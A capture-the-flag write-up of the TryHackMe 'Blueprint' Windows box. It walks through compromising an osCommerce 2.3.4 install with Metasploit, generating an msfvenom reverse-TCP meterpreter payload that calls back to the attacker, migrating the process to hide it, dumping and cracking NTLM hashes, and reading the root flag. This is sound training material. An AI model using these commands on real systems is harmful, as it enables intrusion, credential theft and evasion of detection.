Try Hack Me – Blueprint CTF Writeup

Introduction

This CTF from Try Hack Me is a Windows based box where you have to gain your initial foothold then escalate your privilege.

If you want to try this room you can find it here

In the writeup I’ve written, I have shown this being done using Metasploit, this can be done many other ways but I wanted to demonstrate this method.

Brief

The brief just outlines we are looking for the Lab users decrypted NTLM hash and the Root flag.

Recon and Vulnerability

As always, I started out with my Nmap scan.

nmap -sV -Pn -sC -oN <export_directory> <IP>
blueprint nmap enumeration

The result I’m most interested in is the http site on port 8080, going there brings up the below.

oscommerce main landing for CTF

Just going to this site gave me the version number of oscommerce, i do know there are vulnerabilities in oscommerce so this will be my area of research!

Exploiting the Vulnerability!

Looking through exploitDB I could see there were vulnerabilities listed for oscommerce, so i decided to search Metasploit.

msf console settings

This had exactly what i was looking for!

If you have searched as i have just type use 0

Then type show options

msfconsole showing options

From this screen you need to do the following

set RHOSTS <Target_IP>
set RPORT <Target_Port> #in our case 8080
set LHOST <Your_IP>
set URI <Path_to_Install> #see my note

On the URI, this is the path to the install directory which is usually under the parent folder then /catalog/install/.

Our parent folder is oscommerce-2.3.4 so our URI is oscommerce-2.3.4/catalog/install/.

Once you have set these type run in Metasploit!

THIS ISN’T STABLE!

When this exploit runs, the meterpreter session is prone to disconnecting, I need to sort this!

In a new console tab, I used the below command to generate a MSFVenom payload.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your_IP_Address> LPORT=<your port> -f exe > safeshell1.exe

When you set the port, do not use 4444 as this is being used by the other meterpreter session.

msfvenom payload creation for CTF

Once the payload is generated, I need to get this onto the machine and execute it using the below in my original meterpreter session.

upload safeshell1.exe
execute -f safeshell1.exe

If this doesnt work, make sure the msfvenom payload is in the same directory you started msfconsole from and you may need to re-run your original exploit.

using meterpreter

With this running we need another console tab and to start msfconsole again.

In this new msfconsole type use exploit/multi/handler then type show options.

You need to set the following options;

set LHOST <Your_IP>
set LPORT <Port_from_msfvenom>
set Payload windows/meterpreter/reverse_tcp

Then type run

creating a reverse listener payload

If this didn’t connect straight away, try typing execute -f safeshell1.exe in your original meterpreter session.

BONUS

I wanted to add a little bonus bit in here about migrating, while not required in this CTF, it is good to understand.

At this point, you should consider migrating your meterpreter process into a different process to hide it.

In metasploit you can do this easily by typing

run post/windows/manage/migrate
metasploit post migration

Lets CTF!

Now we have our stable (and migrated) meterpreter session, lets get the flags!

We know we need to decode the lab users hash, so in meterpeter type in hashdump.

getting the flags

The lab users hash is the last one on the list and the bit we need to copy is everything between the last : which I’ve tried to circle above.

I used crackstation to crack this hash for me!

crackstation password hash cracking

We have our first flag!

Now time for root, in our meterpreter session, type in shell to give us a windows shell.

final CTF

I managed to find the flag in the administrators desktop so to get there type in;

cd c:\
cd Users
cd Administrator
cd Desktop
dir
more root.txt.txt
final CTF complete

We did it!

This gives us the root flag for the blueprint box!

Conclusion

This is a really good room to practice metasploit skills, i really do recommend that you give the process migration a go!

If you have any questions or want to suggest a room for me to do next let me know!